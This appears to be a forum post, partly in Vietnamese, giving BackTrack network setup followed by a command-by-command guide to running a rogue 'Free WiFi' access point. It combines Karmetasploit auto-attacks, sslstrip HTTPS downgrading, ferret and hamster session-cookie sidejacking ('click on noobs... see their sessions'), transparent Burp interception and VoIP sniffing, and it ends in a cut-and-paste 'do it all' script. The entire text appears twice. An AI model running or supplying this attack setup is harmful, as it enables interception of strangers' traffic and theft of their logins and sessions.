Ta tiến hành cài đặt ip tĩnh.
Code:
nano /etc/network/interfaces
bạn chỉnh sửa thành ( cái này là tùy vào lớp mạng của bạn sử dụng nhé )
Code:
iface eth0 inet static
address 192.168.1.100
gateway 192.168.1.1
netmask 255.255.255.0
Ctrl+X --> Y để lưu lại .
[Only registered and activated users can see links. ]
Tiếp tục với file /etc/resolv.conf <~ chỉnh DNS Code:
nano /etc/resolv.conf
và chỉnh như hình
[Only registered and activated users can see links. ]
Ở đây tôi dùng DNS của google ^^.
Lưu lại . Ctrl+X --> Y
Khởi động service network và cho nó tự khởi động mặc định
Code:
service networking start
update-rc.d networking defaults
Khởi động lại VMware
Code:
init 6
------
Get into Backtrack
Use my bt-customize script not BT's.
1. apt-get update
2. apt-get upgrade
3. apt-get clean
VirtualBox guest Additions…not needed anymore with Defcon 18 BT Release
1. cd /usr/src/linux
2. make-kpkg kernel_headers
3. cd ..
4. dpkg -i linux-headers.blah.blah.deb
5. Steal the VBoxLinuxAdditions-x86.run from the VirtualBox server directory.
6. ./VBoxLinuxAdditions-x86.run
Update Metasploit this step is required.
http://www.metasploit.com/redmine/projects/framework/wiki/Install_BackTrack
$ sudo bash
cd /pentest/svn
rm -rf framework3
svn co https://www.metasploit.com/svn/framework3/trunk framework3
cd /pentest/svn/framework3/external/pcaprub
ruby extconf.rb
make && make install
cd /pentest/svn
svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
cd lorcon2
./configure —prefix=/usr && make && make install
cd /pentest/svn/framework3/external/ruby-lorcon2
ruby extconf.rb
make && make install
The link it back to the original location
rm /pentest/exploits/framework3
ln -s /pentest/svn/framework3 /pentest/exploits/
To keep it all uptodate:
svn update /pentest/svn/framework3/
You need this too:
gem install activerecord sqlite3-ruby
To fire up an access point
http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit
http://adaywithtape.blogspot.com/2009/10/fake-ap-using-airbase-ng.html
airmon-ng start [wifi-interface]
This will create a monitor interface and tell you what it is. Mine is mon0, yours may be different. Use iwconfig to see it.
aireplay-ng —test [monitor-interface] (i.e mon0)
nano /etc/dhcp3/dhcpd.conf
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
}
nano /etc/default/dhcp3-server
change the interface to "at0" (no not ethX or wlanX…)
to catch every probe request
airbase-ng -P -v
or to advertise a particular network
airbase-ng -P -C 30 -e "Free WiFi" [monitor-interface] (i.e. mon0) -v or -q
Now, when airbase fires up, it creates at0. This at0 is what you use for IP traffic, not wlanX, not ethX…
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
You should now have a running access point. you can now do IP masquerading to serve the nets or do more fun.
Karmetasploit
get karma.rc
1. wget http://metasploit.com/users/hdm/tools/karma.rc
Metasploit auto attack framework:
1. msfconsole -r karma.rc
You need this to keep their shit on your network and not reroute around you and give out net access:
echo 1 > /proc/sys/net/ipv4/ip_forward
### Don't do this shit, it fucks up DNS!!!!—-» iptables -t nat -A PREROUTING -i at0 -j REDIRECT
iptables -t nat -A POSTROUTING -o $wan -s 10.0.0.0/24 -j MASQUERADE
Session Sidejacking HTTP/HTTPS:
http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Update your sslstrip
1. wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
2. tar zxvf sslstrip-0.7.tar.gz
3. cd sslstrip-07
4. python setup.py install
5. cd ..
6. rm -rf sslstrip-0.7*
Monitors HTTPS. fakes out a "lock" favicon in their browser, kill off old sessions and listen to port 10000 by default.
sslstrip -p -k -f
Reroute shit into sslstrip
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports 10000
Sniff session cookies
/pentest/sniffers/hamster/ferret -i at0 or the ethX of the out going interface
Monitor cookie eating
/pentest/sniffers/hamster/hamster
Setup your browser to proxy to 127.0.0.1:1234 and you'll see hamster's interface.
Click on noobs and then on the left you can see their sessions.
Burpsuite 1.3
First setup your firewall to transparently proxy 80 and 443 into Burp.
ipt="/sbin/iptables"
HTTPS Burp Proxy
($honey should be your WLAN interface, probably at0)
honey="at0"
$ipt -t nat -A PREROUTING -i $honey -p tcp —dport 443 -j DNAT —to 10.0.0.1:8080
HTTP Burp Proxy
ipt -t nat -A PREROUTING -i $honey -p tcp —dport 80 -j DNAT —to 10.0.0.1:8181
(10.0.0.1 is the IP of the WLAN interface)
these lines below are only needed if you are running a NAT firewall.
$ipt -A INPUT -i $honey -p tcp —dport 8080 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp —sport 8080 -j ACCEPT
$ipt -A INPUT -i $honey -p tcp —dport 8181 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp —sport 8181 -j ACCEPT
$ipt -A INPUT -i $honey -p udp —dport 53 -j ACCEPT
$ipt -A OUTPUT -o $honey -p udp —sport 53 -j ACCEPT
$ipt -A INPUT -i $honey -j DROP
$ipt -A OUTPUT -o $honey -j DROP
Forward IP
1. echo "1" > /proc/sys/net/ipv4/ip_forward
Masquarade out
$ipt -t nat -A POSTROUTING -o $wan -s 10.0.0.0/24 -j MASQUERADE
Fire up Burp
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar
Proxy tab->Intercept tab->Turn Intercept off.
Proxy tab->Options tab->delete current listener port.
…then add 8181 and 8080.
…Uncheck listen on loopback port
…check support invisible proxying
Xplico 0.5.6
/etc/init.d/apache2 start
/etc/init.d/xplico start
Now surf to localhost:9876
**Remember, the Backtrack apache2 listens on port 80 and 9876. The NMS LAMPP webserver listens on port 81.
!!!!!!You must turn on LAMPP FIRST then apache2 as LAMPP bitches about another webserver running!!!!!!
Silcd
Edit the /etc/silcd/silcd-primary-ip.conf for your IP you want to listen on.
1. /etc/init.d/silcd start
Pidgin with Silcd
Fire up Pidgin
Add a new account
Basic tab —> enter your nick, ip of silcd server, password
Advanced tab —> enter ip of silcd server for connect server, check use perfect forward secrey and public key auth.
Hit Save
You should auto connect, it will ask for your password. If not, simply enable/re-enable your account to connect.
Then click Buddies —> Join a chat —> enter a room name to create and optional password for it.
Ucsniff VOIP sniffer
Will decompress most codecs etc…
ucsniff -i eth0 -M
Do it all script..cut and paste: (assumes WIFI on wlan0, WAN is on eth0 and online)
airmon-ng start wlan0
airbase-ng -P mon0 -v
In another terminal:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 10.0.0.0/24 -j MASQUERADE
/etc/init.d/dhcp3-server start
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp —dport 443 -j DNAT —to 10.0.0.1:8080
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp —dport 80 -j DNAT —to 10.0.0.1:8181
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar
Code:
nano /etc/network/interfaces
bạn chỉnh sửa thành ( cái này là tùy vào lớp mạng của bạn sử dụng nhé )
Code:
iface eth0 inet static
address 192.168.1.100
gateway 192.168.1.1
netmask 255.255.255.0
Ctrl+X --> Y để lưu lại .
[Only registered and activated users can see links. ]
Tiếp tục với file /etc/resolv.conf <~ chỉnh DNS Code:
nano /etc/resolv.conf
và chỉnh như hình
[Only registered and activated users can see links. ]
Ở đây tôi dùng DNS của google ^^.
Lưu lại . Ctrl+X --> Y
Khởi động service network và cho nó tự khởi động mặc định
Code:
service networking start
update-rc.d networking defaults
Khởi động lại VMware
Code:
init 6
------
Get into Backtrack
Use my bt-customize script not BT's.
1. apt-get update
2. apt-get upgrade
3. apt-get clean
VirtualBox guest Additions…not needed anymore with Defcon 18 BT Release
1. cd /usr/src/linux
2. make-kpkg kernel_headers
3. cd ..
4. dpkg -i linux-headers.blah.blah.deb
5. Steal the VBoxLinuxAdditions-x86.run from the VirtualBox server directory.
6. ./VBoxLinuxAdditions-x86.run
Update Metasploit this step is required.
http://www.metasploit.com/redmine/projects/framework/wiki/Install_BackTrack
$ sudo bash
cd /pentest/svn
rm -rf framework3
svn co https://www.metasploit.com/svn/framework3/trunk framework3
cd /pentest/svn/framework3/external/pcaprub
ruby extconf.rb
make && make install
cd /pentest/svn
svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
cd lorcon2
./configure —prefix=/usr && make && make install
cd /pentest/svn/framework3/external/ruby-lorcon2
ruby extconf.rb
make && make install
The link it back to the original location
rm /pentest/exploits/framework3
ln -s /pentest/svn/framework3 /pentest/exploits/
To keep it all uptodate:
svn update /pentest/svn/framework3/
You need this too:
gem install activerecord sqlite3-ruby
To fire up an access point
http://www.metasploit.com/redmine/projects/framework/wiki/Karmetasploit
http://adaywithtape.blogspot.com/2009/10/fake-ap-using-airbase-ng.html
airmon-ng start [wifi-interface]
This will create a monitor interface and tell you what it is. Mine is mon0, yours may be different. Use iwconfig to see it.
aireplay-ng —test [monitor-interface] (i.e mon0)
nano /etc/dhcp3/dhcpd.conf
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
}
nano /etc/default/dhcp3-server
change the interface to "at0" (no not ethX or wlanX…)
to catch every probe request
airbase-ng -P -v
or to advertise a particular network
airbase-ng -P -C 30 -e "Free WiFi" [monitor-interface] (i.e. mon0) -v or -q
Now, when airbase fires up, it creates at0. This at0 is what you use for IP traffic, not wlanX, not ethX…
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
You should now have a running access point. you can now do IP masquerading to serve the nets or do more fun.
Karmetasploit
get karma.rc
1. wget http://metasploit.com/users/hdm/tools/karma.rc
Metasploit auto attack framework:
1. msfconsole -r karma.rc
You need this to keep their shit on your network and not reroute around you and give out net access:
echo 1 > /proc/sys/net/ipv4/ip_forward
### Don't do this shit, it fucks up DNS!!!!—-» iptables -t nat -A PREROUTING -i at0 -j REDIRECT
iptables -t nat -A POSTROUTING -o $wan -s 10.0.0.0/24 -j MASQUERADE
Session Sidejacking HTTP/HTTPS:
http://g0tmi1k.blogspot.com/2010/03/video-session-sidejacking-ferret-and.html
Update your sslstrip
1. wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
2. tar zxvf sslstrip-0.7.tar.gz
3. cd sslstrip-07
4. python setup.py install
5. cd ..
6. rm -rf sslstrip-0.7*
Monitors HTTPS. fakes out a "lock" favicon in their browser, kill off old sessions and listen to port 10000 by default.
sslstrip -p -k -f
Reroute shit into sslstrip
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-ports 10000
Sniff session cookies
/pentest/sniffers/hamster/ferret -i at0 or the ethX of the out going interface
Monitor cookie eating
/pentest/sniffers/hamster/hamster
Setup your browser to proxy to 127.0.0.1:1234 and you'll see hamster's interface.
Click on noobs and then on the left you can see their sessions.
Burpsuite 1.3
First setup your firewall to transparently proxy 80 and 443 into Burp.
ipt="/sbin/iptables"
HTTPS Burp Proxy
($honey should be your WLAN interface, probably at0)
honey="at0"
$ipt -t nat -A PREROUTING -i $honey -p tcp —dport 443 -j DNAT —to 10.0.0.1:8080
HTTP Burp Proxy
ipt -t nat -A PREROUTING -i $honey -p tcp —dport 80 -j DNAT —to 10.0.0.1:8181
(10.0.0.1 is the IP of the WLAN interface)
these lines below are only needed if you are running a NAT firewall.
$ipt -A INPUT -i $honey -p tcp —dport 8080 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp —sport 8080 -j ACCEPT
$ipt -A INPUT -i $honey -p tcp —dport 8181 -j ACCEPT
$ipt -A OUTPUT -o $honey -p tcp —sport 8181 -j ACCEPT
$ipt -A INPUT -i $honey -p udp —dport 53 -j ACCEPT
$ipt -A OUTPUT -o $honey -p udp —sport 53 -j ACCEPT
$ipt -A INPUT -i $honey -j DROP
$ipt -A OUTPUT -o $honey -j DROP
Forward IP
1. echo "1" > /proc/sys/net/ipv4/ip_forward
Masquarade out
$ipt -t nat -A POSTROUTING -o $wan -s 10.0.0.0/24 -j MASQUERADE
Fire up Burp
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar
Proxy tab->Intercept tab->Turn Intercept off.
Proxy tab->Options tab->delete current listener port.
…then add 8181 and 8080.
…Uncheck listen on loopback port
…check support invisible proxying
Xplico 0.5.6
/etc/init.d/apache2 start
/etc/init.d/xplico start
Now surf to localhost:9876
**Remember, the Backtrack apache2 listens on port 80 and 9876. The NMS LAMPP webserver listens on port 81.
!!!!!!You must turn on LAMPP FIRST then apache2 as LAMPP bitches about another webserver running!!!!!!
Silcd
Edit the /etc/silcd/silcd-primary-ip.conf for your IP you want to listen on.
1. /etc/init.d/silcd start
Pidgin with Silcd
Fire up Pidgin
Add a new account
Basic tab —> enter your nick, ip of silcd server, password
Advanced tab —> enter ip of silcd server for connect server, check use perfect forward secrey and public key auth.
Hit Save
You should auto connect, it will ask for your password. If not, simply enable/re-enable your account to connect.
Then click Buddies —> Join a chat —> enter a room name to create and optional password for it.
Ucsniff VOIP sniffer
Will decompress most codecs etc…
ucsniff -i eth0 -M
Do it all script..cut and paste: (assumes WIFI on wlan0, WAN is on eth0 and online)
airmon-ng start wlan0
airbase-ng -P mon0 -v
In another terminal:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -s 10.0.0.0/24 -j MASQUERADE
/etc/init.d/dhcp3-server start
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp —dport 443 -j DNAT —to 10.0.0.1:8080
/sbin/iptables -t nat -A PREROUTING -i at0 -p tcp —dport 80 -j DNAT —to 10.0.0.1:8181
java -jar -Xmx512m /pentest/burpsuite_v1.3/burpsuite_v1.3.03.jar